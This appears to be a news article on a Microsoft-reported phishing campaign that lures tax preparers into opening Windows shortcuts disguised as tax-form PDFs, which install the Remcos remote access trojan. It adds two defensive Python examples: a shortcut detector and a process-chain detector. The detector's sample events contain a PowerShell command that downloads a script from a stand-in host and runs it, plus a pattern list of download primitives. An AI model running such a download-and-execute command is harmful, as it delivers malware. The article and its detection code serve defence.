
Phishing attack targets accountants as Tax Day approaches


Microsoft is warning of a phishing campaign targeting accounting firms and tax preparers with remote access malware that gives the attackers an initial foothold in corporate networks.

With the US tax season drawing to a close, accountants are scrambling to collect clients' tax documents so they can complete and file their returns.

This makes it an ideal time for threat actors to target tax preparers, hoping that, under deadline pressure, they open malicious files they would otherwise treat with more caution.

This is exactly what Microsoft has observed in a new phishing campaign that targets tax professionals in order to install the Remcos remote access trojan.

“With U.S. Tax Day approaching, Microsoft has observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year,” Microsoft warns in a new report.

Targeting tax professionals

The phishing campaign starts with emails that purport to come from clients sending the documents needed to complete their return.

“I apologize not responding sooner; our individual tax return should be simple and not require much of your time,” reads a phishing email seen by Microsoft.

“I believe you would require a copy of our most recent year’s documents, such as W-2s, 1099s, mortgages, interest, donations, medical investments, HSAs, and so on which I have uploaded below.”

Phishing email sent to tax preparers
Source: Microsoft

These phishing emails contain links that pass through click-tracking services to evade detection by security software and ultimately lead to a file hosting site that serves a ZIP archive.

This ZIP archive contains numerous files that pose as PDF copies of various tax forms but are actually Windows shortcut (LNK) files.

Archive containing Windows shortcuts disguised as 2021 tax forms
Source: Microsoft
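The defensive check a mail gateway or analyst would want here is to classify archive members by their content rather than their name, because Windows Explorer hides the .lnk extension even when other extensions are shown, so "W-2.pdf.lnk" is displayed as "W-2.pdf". The following is an added example, not Microsoft's or BleepingComputer's code; the archive it inspects is constructed in memory with stand-in file names (the real campaign's archive contents are only shown in the screenshot), and the shortcut bodies are just a valid LNK header followed by padding.

```python
import io
import zipfile

# A Windows shortcut begins with HeaderSize = 0x0000004C followed by the
# ShellLink CLSID {00021401-0000-0000-C000-000000000046} in on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
PDF_MAGIC = b"%PDF-"


def classify(head: bytes) -> str:
    """Classify a file by its leading bytes, ignoring whatever the name claims."""
    if head.startswith(LNK_MAGIC):
        return "lnk"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    return "other"


def find_disguised_shortcuts(zip_bytes: bytes) -> list:
    """Return archive members that are Windows shortcuts, or that are named as
    shortcuts, inside an archive that is supposed to contain tax documents."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(len(LNK_MAGIC))  # header bytes are enough
            kind = classify(head)
            name = info.filename.lower()
            if kind == "lnk" or name.endswith(".lnk"):
                hits.append(info.filename)
    return hits


def build_sample_archive() -> bytes:
    """Constructed stand-in for the campaign's ZIP (assumed names, not real files)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("2021 W-2.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("2021 1099-INT.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("Mortgage interest statement.pdf", PDF_MAGIC + b"1.7\n%\xe2\xe3\xcf\xd3\n")
        zf.writestr("README.txt", b"Please open the attached forms.")
    return buf.getvalue()


if __name__ == "__main__":
    for name in find_disguised_shortcuts(build_sample_archive()):
        print("shortcut disguised as a document:", name)
```

The content check matters more than the extension check: a renamed shortcut with no .lnk suffix at all is still flagged, and conversely a member named "form.pdf" whose first bytes are the LNK header is caught without trusting the name.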

When double-clicked, these shortcuts launch PowerShell to download a heavily obfuscated VBS file from a remote host, save it to C:\Windows\Tasks, and execute it.

At the same time, the VBS script downloads a decoy PDF and opens it in Microsoft Edge so that the target sees the document they were expecting and is less likely to become suspicious.

Microsoft says the VBS file then downloads and executes the GuLoader malware, which in turn installs the Remcos remote access trojan.

Attack flow of phishing campaign
Source: Microsoft
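The process chain described above (explorer.exe spawning PowerShell with a download primitive, a script dropped into C:\Windows\Tasks, then a script host executing from that directory) is what an endpoint detection would key on. Below is an added example of that detection logic, not Microsoft's or BleepingComputer's code; the events it runs over are constructed to resemble Sysmon process-creation records, and the command lines, the host name example.invalid and the script name form.vbs are assumptions rather than indicators from the campaign.

```python
import re

# Constructed sample of process-creation events (Sysmon Event ID 1 style).
# These are not real telemetry from the campaign; values are illustrative.
SAMPLE_EVENTS = [
    {"id": 1,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','C:\Windows\Tasks\form.vbs'); wscript C:\Windows\Tasks\form.vbs"},
    {"id": 2,
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\Windows\Tasks\form.vbs"},
    {"id": 3,  # benign: interactive PowerShell, no download, no Tasks directory
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users\acct\Documents"},
    {"id": 4,  # benign: vendor maintenance script from Program Files
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Program Files\Vendor\maint.vbs"},
]

# Download primitives commonly seen in PowerShell stagers.
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
# C:\Windows\Tasks is writable by standard users, which is why it is a popular staging directory.
TASKS_DIR = re.compile(r"C:\\Windows\\Tasks\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(events: list) -> list:
    """Return (event id, rule name) pairs for events matching either stage of the chain."""
    alerts = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        # Stage 1: a shortcut double-clicked in Explorer spawns PowerShell that
        # fetches something from the network and writes it under C:\Windows\Tasks.
        if (image == "powershell.exe" and parent == "explorer.exe"
                and DOWNLOAD_PRIMITIVES.search(cmd) and TASKS_DIR.search(cmd)):
            alerts.append((ev["id"], "powershell-download-to-windows-tasks"))
        # Stage 2: a script host runs a script out of C:\Windows\Tasks.
        elif image in SCRIPT_HOSTS and TASKS_DIR.search(cmd):
            alerts.append((ev["id"], "script-host-from-windows-tasks"))
    return alerts


if __name__ == "__main__":
    for event_id, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The two rules are deliberately independent so that either stage alone raises an alert: the obfuscated VBS will not match static content signatures, but a script host executing from C:\Windows\Tasks is unusual enough on a workstation to be worth triaging on its own.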

Remcos is a remote access trojan that threat actors commonly use in phishing campaigns to…

Read the full original article at BleepingComputer.